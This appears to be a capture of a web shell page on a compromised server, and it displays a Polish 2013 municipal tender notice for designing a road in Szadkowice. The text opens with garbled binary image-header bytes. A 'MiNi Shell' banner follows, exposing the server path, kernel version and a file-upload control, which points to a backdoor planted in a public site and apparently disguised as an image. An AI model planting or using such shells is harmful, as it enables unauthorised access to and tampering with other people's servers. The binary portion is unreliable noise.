JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130926/390322-N-2013.html

<p class="kh_header"><b>Sławno: Opracowanie dokumentacji projektowej  wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) 
na zadanie pn. Budowa drogi gminnej w miejscowości Szadkowice na odcinku 
od drogi powiatowej Nr 3101 E do drogi wojewódzkiej Nr 713</b><br>
<b>Numer ogłoszenia: 390322 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławno , ul. Marszałka Józefa Piłsudskiego 31, 26-332 Sławno, woj. łódzkie, tel. 044 755-18-50, faks 044 755-18-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugslawno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej  wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) 
na zadanie pn. Budowa drogi gminnej w miejscowości Szadkowice na odcinku 
od drogi powiatowej Nr 3101 E do drogi wojewódzkiej Nr 713.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest opracowanie dokumentacji projektowej  wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) 
na zadanie pn. Budowa drogi gminnej w miejscowości Szadkowice na odcinku 
od drogi powiatowej Nr 3101 E do drogi wojewódzkiej Nr 713, zgodnie z Ustawą 
o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t. j. Dz. U. z 2008 r. Nr 193, poz. 1194 z późń. zm.)
Zadanie obejmuje budowę drogi gminnej położonej na terenie gminy Sławno 
tj. na odcinku od skrzyżowania z drogą powiatową nr 3101 E w miejscowości Szadkowice do skrzyżowania z drogą wojewódzką nr 713 w miejscowości Antoniówka. Opracowanie projektowe powinno obejmować całą drogę łącznie ze skrzyżowaniem z drogą powiatową nr 3101 E oraz drogą wojewódzką Nr 713. Planowany do przebudowy jest odcinek o długości ok. 450 mb, projektowany odcinek drogi przebiega przez teren kolejowy oraz grunty prywatne.

Opis stanu istniejącego
	450 mb - grunt rodzimy, jezdnia żwirowa	

Wytyczne projektowe
	wykonanie koryta 
	wykonanie warstwy odsączającej gr. łączna po zagęszczeniu 20 cm
	wykonanie podbudowy z dwóch warstw tłucznia frakcja 0-63 mm i 0 - 31,5 mm grubość  łączna po zagęszczeniu 20 cm
	wykonanie nawierzchni asfaltowej o szerokości 5 m 
	wykonanie warstwy wiążącej zamkniętej gr. 6 cm
	wykonanie poboczy - obustronne, utwardzone tłuczniem frakcji 0-31,5 mm gr. 10 cm na wysokości działek niezabudowanych o szerokości 1 - 1,5 m
	rów jednostronny od strony posesji
	przepusty pod zjazdami
	zjazdy indywidualne do posesji wykonane w nawierzchni asfaltowej
	zjazdy gospodarcze wykonane w nawierzchni asfaltowej
	oznakowanie pionowe i poziome
	oświetlenie uliczne 
	pętla autobusowa w okolicach połączenia z drogą wojewódzką Nr 713 
	rozwiązanie problemu odprowadzenia wód opadowych z projektowanej drogi gminnej 
i zagospodarowanie ich w pasie drogi powiatowej i wojewódzkiej.
	wykonanie podziałów geodezyjnych dla około 30 działek
	w pasie drogowym projektowanej drogi znajdują się:
	 kabel telefoniczny,
 sieć gazowa,
	 sieć wodociągowa
	 oraz sieć kanalizacji sanitarnej.
	Szlak drogi w większości znajduje się w terenie kolejowym, możliwość lokalizacji urządzeń infrastruktury kolejowej w terenie przewidzianym pod pas drogowy. 

2.Projektant zobowiązuje się do:
a) sprawowania nadzoru autorskiego, polegającego na sprawdzeniu zgodności realizacji
  robót z dokumentacją projektową i uzgadnianiu możliwości wprowadzania w razie  
  potrzeby rozwiązań zamiennych, zgodnie z ustawą Prawo Budowlane

3. Przedmiot zamówienia  obejmuje wykonanie przez wykonawcę (projektanta ) 
1) Projektu budowlano - wykonawczego sporządzonego w oparciu o ustawę
        z dnia 7 lipca 1994 r. Prawo budowlane ( tekst jednolity Dz. U. z 2010 r. nr 243, 
        poz. 1623 z późn. zm.), i  rozporządzenie ministra transportu, budownictwa 
        i gospodarki morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu
        i formy projektu budowlanego   (Dz. U. z 2012 r. poz. 462)
                      Zamawiający otrzyma od projektanta: 
a)	 Wydruk ww projektu - po  5 egzemplarzy,
b)	 wersję elektroniczną ww projektu na płycie CD  - po 2 egz.

2)  Przedmiar   robót  dla   opracowania  jw. sporządzony  w  oparciu o rozporządzenie 
       Ministra Infrastruktury  z dnia 2 września 2004r. w sprawie szczegółowego zakresu 
      i formy  dokumentacji projektowej,      specyfikacji technicznych wykonania i odbioru 
      robót budowlanych oraz programu funkcjonalno- użytkowego (Dz. U. z 2004 r. Nr 202, 
      poz. 2072 z późn. zm.).
    		  Zamawiający otrzyma od projektanta:  
a)	wydruk przedmiaru robót - po 2 egzemplarze,
b)	wersję elektroniczną przedmiaru robót  na płycie CD  - 2 egz.

3) Kosztorys  inwestorski dla opracowania jw. wraz ze zbiorczym zestawieniem kosztów
     sporządzonych w oparciu  o rozporządzenie  Ministra Infrastruktury  z dnia 18 maja 
     2004 r. w sprawie określenia metod i podstaw  sporządzania kosztorysu   
    inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych
    kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym  
   ( Dz. U. z 2004r. Nr 130, poz. 1389 )  
     		 Zamawiający otrzyma od projektanta:  
     	  a) wydruk kosztorysu - po 2 egzemplarze,
                  	  b) wersję elektroniczną kosztorysu inwestorskiego na płycie CD  - 2 egz.

4) Specyfikacja technicznego wykonania i odbioru robót budowlanych dla opracowania 
      jw. sporządzone w oparciu o rozporządzenie Ministra Infrastruktury z dnia 2 września 
      2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej,  
      specyfikacji technicznych wykonania i odbioru robót  budowlanych oraz programu 
      funkcjonalno-użytkowego (Dz. U. z 2004r. Nr 202, poz. 2072 ze zmianami)     
                            Zamawiający otrzyma od projektanta:  
                                       a) wydruk  - po 1 egzemplarzu,
                                       b) wersję elektroniczną na płycie CD  - 2 egz.

4.	Do obowiązków projektanta należy ponadto opracowanie, uzyskanie:

1.Mapy do celów projektowych, inwentaryzacji i ocena stanu technicznego ( infrastruktura 
    techniczna) wraz z wypisami z rejestru gruntów. 
2. Dokumentacji  geotechnicznej  - badania konstrukcji nawierzchni i podłoża. 

3.Materiałów do uzyskania opinii, analiz, uzgodnień i pozwoleń, w tym wymaganych 
   przepisami szczególnymi. 

4.Niezbędnych  materiałów do wniosku o uzyskanie decyzji zezwolenia na realizację 
   inwestycji drogowej (między innymi decyzja o środowiskowych uwarunkowaniach zgody na 
   realizację przedsięwzięcia, pozwolenie wodno prawne, decyzja o ustaleniu lokalizacji 
   inwestycji celu publicznego i inne wymagane przepisami prawa). 

5.Projektu organizacji ruchu (stałej i na czas prowadzenia robót). 
6.Informacji dotyczącej  bezpieczeństwa i ochrony zdrowia. 
7.Pomiaru natężenia ruchu oraz jego prognoza. 
8.Map  zawierających  podziały działek zajętych pod projektowaną inwestycję. 
9.W przypadku konieczności przebudowy kolidujących urządzeń infrastruktury technicznej, 
   jeżeli będzie to niezbędne - opracowanie projektów branżowych (podwykonawczych). 
10. wykonanie dokumentacji geodezyjnej w zakresie uregulowania stanu prawnego gruntów, 
     wydzielenia pasa drogowego, dokonania podziałów geodezyjnych, przeniesienia własności 
      gruntów.

5.W zakres zamówienia wchodzi ponadto: 

1. Przygotowanie odpowiedzi na etapie przetargu i ewentualna modyfikacja dokumentacji. 
2. Ewentualne zaktualizowanie całości bądź w częściach kosztorysu inwestorskiego na etapie 
    przygotowywania procedur przetargowych, 

6. Dokumentacja stanowiąca przedmiot odbioru powinna być zaopatrzona w następujące załączniki :
1)	wykaz opracowań,
2)	pisemne oświadczenie Projektanta i sprawdzającego, że dokumentacja jest wykonana zgodnie z umową, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
3)	pisemne oświadczenie Projektanta, że dokumentacja zostaje wydana w stanie zupełnym (kompletnym dla celu, któremu ma służyć),
7. Załączniki ww. stanowić będą  integralną część dokumentacji projektowej.

8. Projektowane technologie, urządzenia oraz materiały winny być dopuszczone do obrotu 
       i stosowania w budownictwie przy przestrzeganiu Polskich Norm przenoszących    
       europejskie  normy zharmonizowane. W przypadku braku tych  norm należy uwzględnić:
a)	europejskie aprobaty techniczne,
b)	Polskie Normy przenoszące normy europejskie,
c)	Normy państw członkowskich UE przenoszące europejskie normy zharmonizowane,
d)	Polskie Normy wprowadzające normy międzynarodowe,
e)	Polskie aprobaty techniczne
9. Projektant przedłoży zamawiającemu:
	dokumentację projektową w wersji papierowej  i w wersji elektronicznej  zapisanej na płytach CD 
mapy -  w wersji papierowej (scany,  wersja elektroniczna )
	część tekstowa,  powinna być zapisana w  edytorze tekstu MICROSOFT WORD 
	przedmiary robót  i kosztorys inwestorski w programie NORMA  Pro i EXCEL lub MICROSOFT WORD
10. Przyjęte rozwiązania projektowe winny minimalizować ilość i zakres kolizji  z istniejącymi 
      elementami infrastruktury technicznej. Zakres kolizji powinien być uzgodniony 
      z Zamawiającym przed przystąpieniem do opracowania projektów   budowlanych

11. Obowiązki  projektanta na etapie opracowywania  dokumentacji   projektowej:
1. Przed przystąpieniem do sporządzenia właściwego projektu, Projektant  jest   
      zobowiązany przedłożyć Zamawiającemu koncepcję  - projektu i uzyskać jego 
      akceptację.
2.Zamawiający oczekuje  autorskich, nowatorskich i nowoczesnych rozwiązań 
   architektonicznych,   technologicznych i funkcjonalnych  prowadzących do 
    minimalizacji   kosztów eksploatacji.
3. Projektanta zobowiązany jest do pisemnego uzgodnienia z Zamawiającym  wstępnej 
     fazy   rozwiązań projektowych  jak i propozycji zagospodarowania terenu.
4. Projektant zobowiązany jest do zorganizowania minimum  jednego spotkania
      roboczego z Zamawiającym  na etapie sporządzania dokumentacji projektowej w celu 
      omówienia przyjętych  rozwiązań projektowych i materiałowych, które muszą 
     zakończyć się pisemnymi  protokółami   podpisanymi przez strony.
  

12.Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji projektu i w jego okolicy
     w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego 
     postępowania przez Zamawiając

Wykonawca może powierzyć wykonywanie części zamówienia podwykonawcom.  

Wykonawca zobowiązany jest do wskazania w ofercie części zamówienia, którą część zamówienia zamierza powierzyć podwykonawcom / jeżeli dotyczy/, art. 36 ust. 4 ustawy 
z dnia 29.01.2004 r. - Prawo zamówień publicznych (t. j. Dz. U. z 2013 r. poz. 907 z późń. zm  )..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony we wszystkich pozycjach  formularz ofertowy (wg załączonego wzoru Nr 1 ) 
2.	Dokument pełnomocnictwa - ( oryginał lub notarialnie poświadczona kopia ) do podpisania oferty, 
jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem 
rejestracyjnym, również w przypadku złożenia  oferty przez wykonawców ubiegających 
się o zamówienie wspólnie ( np. konsorcjum, sp. cywilna ), pełnomocnictwo powinno 
jednoznacznie   określać zakres umocowania  i wskazywać osobę pełnomocnika.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególności Zamawiający przewiduje możliwość dokonania zmian umowy w następującym zakresie: 
	 zmiana terminu realizacji przedmiotu zamówienia, jeżeli zmiana jest spowodowana okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy, 
np. warunki atmosferyczne, archeologiczne, geologiczne lub w przypadku wystąpienia siły wyższej (tj. działania i zamieszki wojenne, ataki terrorystyczne, klęski żywiołowe spowodowane przez burze, huragany, tajfuny, trzęsienia ziemi, ekonomiczne następstwa globalnego kryzysu finansowego i inne) uniemożliwiające wykonanie zamówienia w terminie umownym;
	 zmiana terminu realizacji zamówienia spowodowana przedłużającymi się procedurami administracyjnymi na etapie wydawania opinii, uzgodnień, postanowień i decyzji administracyjnych, co nie wynikło z winy lub zaniedbania Wykonawcy; 
	zmiana terminu realizacji zamówienia, w przypadku udzielenia Wykonawcy zamówień dodatkowych; 
	zmiana terminu realizacji zamówienia z przyczyn leżących po stronie Zamawiającego, np. konieczność usunięcia błędów lub wprowadzenia zmian w dokumentach stanowiących podstawę projektowania, konieczność dokonania ustaleń i udzielenia wyjaśnień oraz inne przyczyny, za które nie odpowiada Wykonawca; 
	zmiana umowy w zakresie kluczowego personelu Wykonawcy i Zamawiającego
(w przypadku personelu Wykonawcy za uprzednią zgodą Zamawiającego wyrażoną na piśmie);zmiana oznaczenia danych dotyczących Zamawiającego lub Wykonawcy; 	zmiana umowy, jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
	Wykonawca może w trakcie realizacji zamówienia, za uprzednią pisemną zgodą Zamawiającego, zastąpić Podwykonawcę innym Podwykonawcą, pod warunkiem, że wykaże on spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy Podwykonawca.
8. Określa się następujący tryb dokonywania zmian postanowień umowy:
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron
      wyrażoną   na piśmie, pod rygorem nieważności,
b) strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do
     udokumentowania   zaistnienia powyższych okoliczności,
c)  wniosek o zmianę postanowień zawartej umowy musi być wyrażony na  piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugslawno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój Nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2013 godzina 10:00, miejsce: Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój Nr 13 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com